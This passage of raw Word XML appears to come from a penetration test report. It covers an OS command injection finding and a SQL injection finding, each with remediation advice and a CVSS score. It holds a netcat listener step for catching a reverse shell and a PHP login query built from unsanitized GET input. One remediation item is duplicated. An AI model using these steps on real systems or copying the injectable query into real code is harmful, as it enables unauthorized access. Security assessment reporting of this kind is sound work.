      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ListenerPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69939220" w14:textId="346C6434" w:rsidR="005D3AC9" w:rsidRPr="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Send the request to the server and wait for a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126AB9DA" w14:textId="502E6D2A" w:rsidR="005D3AC9" w:rsidRPr="007B579A" w:rsidRDefault="005D3AC9" w:rsidP="005D3AC9"/>
    <w:p w14:paraId="1017166C" w14:textId="2728EA5F" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156AAC1D" w14:textId="77777777" w:rsidR="00C566FB" w:rsidRPr="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input validation and sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00C566FB">
        <w:t>: One of the most effective ways to prevent OS command injection is to ensure that all user inputs are validated and sanitized properly. This involves checking for the presence of special characters that could be used to execute OS commands and filtering them out. This can be done using a whitelist or blacklist approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75F0FB" w14:textId="77777777" w:rsidR="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of parameterized queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C566FB">
        <w:t xml:space="preserve"> Another recommended approach is to use parameterized queries when interacting with the database or other backend systems. This can help prevent attackers from injecting malicious commands into the query by ensuring that the query is pre-compiled and only allows for predefined parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50F568" w14:textId="2314AC24" w:rsidR="00C566FB" w:rsidRPr="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of parameterized queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C566FB">
        <w:t xml:space="preserve"> Another recommended approach is to use parameterized queries when interacting with the database or other backend systems. This can help prevent attackers from injecting malicious commands into the query by ensuring that the query is pre-compiled and only allows for predefined parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BAE1A" w14:textId="2DA74F53" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DC61D" w14:textId="20DA4150" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B93080" w14:textId="0A5111EB" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/os-command-injection#:~:text=OS%20command%20injection%20(also%20known,application%20and%20all%20its%20data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705CFA28" w14:textId="6B1CB3B9" w:rsidR="004956AA" w:rsidRDefault="004956AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F36985" w14:textId="4562B3BE" w:rsidR="004956AA" w:rsidRPr="006F5E52" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222415FE" w14:textId="77777777" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">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4956AA" w:rsidRPr="005264D0" w14:paraId="2E30829F"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D520256" w14:textId="147CE7BC" w:rsidR="004956AA" w:rsidRPr="005264D0" w:rsidRDefault="00C566FB" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004956AA" w:rsidRPr="005264D0" w14:paraId="37B088D2"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7030A0"/>
          </w:tcPr>
          <w:p w14:paraId="160FDE63" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="00DA733E" w:rsidRDefault="004956AA" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Critical Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D3B5E9"/>
          </w:tcPr>
          <w:p w14:paraId="79D34085" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="005264D0" w:rsidRDefault="004956AA" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D3B5E9"/>
          </w:tcPr>
          <w:p w14:paraId="385F363D" w14:textId="0BDCBBC7" w:rsidR="004956AA" w:rsidRPr="005264D0" w:rsidRDefault="004956AA" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidR="006C5C9E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004956AA" w:rsidRPr="005264D0" w14:paraId="05704C3D"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7030A0"/>
          </w:tcPr>
          <w:p w14:paraId="0A7D9EC8" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="005264D0" w:rsidRDefault="004956AA" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="104124DE" w14:textId="77777777" w:rsidR="004956AA" w:rsidRPr="005264D0" w:rsidRDefault="004956AA" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3013B1" w14:textId="3CF9DFAF" w:rsidR="004956AA" w:rsidRPr="005264D0" w:rsidRDefault="006C5C9E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C5C9E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C5C9E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C5C9E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F96DBE3" w14:textId="32158472" w:rsidR="004956AA" w:rsidRPr="006C5C9E" w:rsidRDefault="004956AA" w:rsidP="007B579A">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E" w:rsidRPr="006C5C9E">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E" w:rsidRPr="006C5C9E">
        <w:t xml:space="preserve"> arise when an application takes user input and constructs an SQL query without properly validating or sanitizing that input</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E">
        <w:t>, potentially allowing</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E" w:rsidRPr="006C5C9E">
        <w:t xml:space="preserve"> an attacker </w:t>
      </w:r>
      <w:r w:rsidR="00C566FB" w:rsidRPr="006C5C9E">
        <w:t>to insert</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E" w:rsidRPr="006C5C9E">
        <w:t xml:space="preserve"> their own SQL code into the query. This can allow them to execute SQL commands on the database or perform actions that the application was not intended to allow. SQL injection attacks can occur in a variety of situations, including login forms, search fields, and any other place where user input is processed by the application.</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E">
        <w:t xml:space="preserve"> SQL injection attacks</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E" w:rsidRPr="006C5C9E">
        <w:t xml:space="preserve"> can lead to the compromise of sensitive information like credit card details, passwords, and personal user information.</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E">
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="006C5C9E" w:rsidRPr="006C5C9E">
        <w:t xml:space="preserve">t is important to use prepared statements or parameterized queries, which can help ensure that user input is properly validated and sanitized before being used in an SQL query. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645E135" w14:textId="18D3F2CB" w:rsidR="007B579A" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327E1E8" w14:textId="21908E63" w:rsidR="007B579A" w:rsidRDefault="007B579A" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="007B579A">
        <w:t>http://10.10.0.66:8001/login.php?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF7B19" w14:textId="5240B120" w:rsidR="007B579A" w:rsidRPr="007B579A" w:rsidRDefault="007B579A" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007B579A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidRPr="007B579A">
        <w:t>URL Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC530C" w14:textId="00A21C9F" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F738E63" w14:textId="6E9A7A4F" w:rsidR="001E55F8" w:rsidRPr="00F66181" w:rsidRDefault="005D3AC9" w:rsidP="001E55F8">
      <w:r>
        <w:t>The login form on the NBN staging website</w:t>
      </w:r>
      <w:r w:rsidR="001E55F8">
        <w:t>, shown in the figure below, allows the user to input a username and password to log into the application. After the user inputs their username and password, the values are inserted into a SQL query string, as shown in the below figure. The query is then executed against the application server database.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E55F8" w14:paraId="6CA6DB1F" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6D085E08" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>// Get username</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731CF770" w14:textId="30EC6D51" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $user = </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'username' ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="394D719C" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        // Get password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0C3321" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $pass = $_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 'password' ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E126170" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $pass = md</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pass );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3230E79F" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41A86510" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        // Check the database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7439E722" w14:textId="77777777" w:rsidR="001E55F8" w:rsidRPr="0055639E" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query  =</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> "SELECT * FROM `users` WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>user = '$user'</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> AND password = '$pass';";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A8D5FF4" w14:textId="6C64F8C3" w:rsidR="001E55F8" w:rsidRPr="004956AA" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        $result = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysqli_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>query</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$conn, $query) or die( '&lt;pre&gt;' . </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysqli_error</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>($conn</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> '&lt;/pre&gt;' );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60BB4A0E" w14:textId="1BCF49A5" w:rsidR="001E55F8" w:rsidRDefault="001E55F8" w:rsidP="001E55F8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20618F22" w14:textId="77777777" w:rsidR="0055639E" w:rsidRDefault="001E55F8" w:rsidP="00056C3E">
      <w:r>
        <w:t>The above function places user input directly into a string that is later executed as a SQL query. An attacker can use specially crafted input to execute arbitrary SQL commands on the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD17B95" w14:textId="77777777" w:rsidR="0055639E" w:rsidRDefault="0055639E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB30DF8" w14:textId="59BCD202" w:rsidR="00056C3E" w:rsidRDefault="001E55F8" w:rsidP="00056C3E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The assessment team was able to inject SQL code that allowed them to access </w:t>
      </w:r>
      <w:r w:rsidR="00056C3E">
        <w:t xml:space="preserve">application resources protected by authentication. The application responded to the </w:t>
      </w:r>
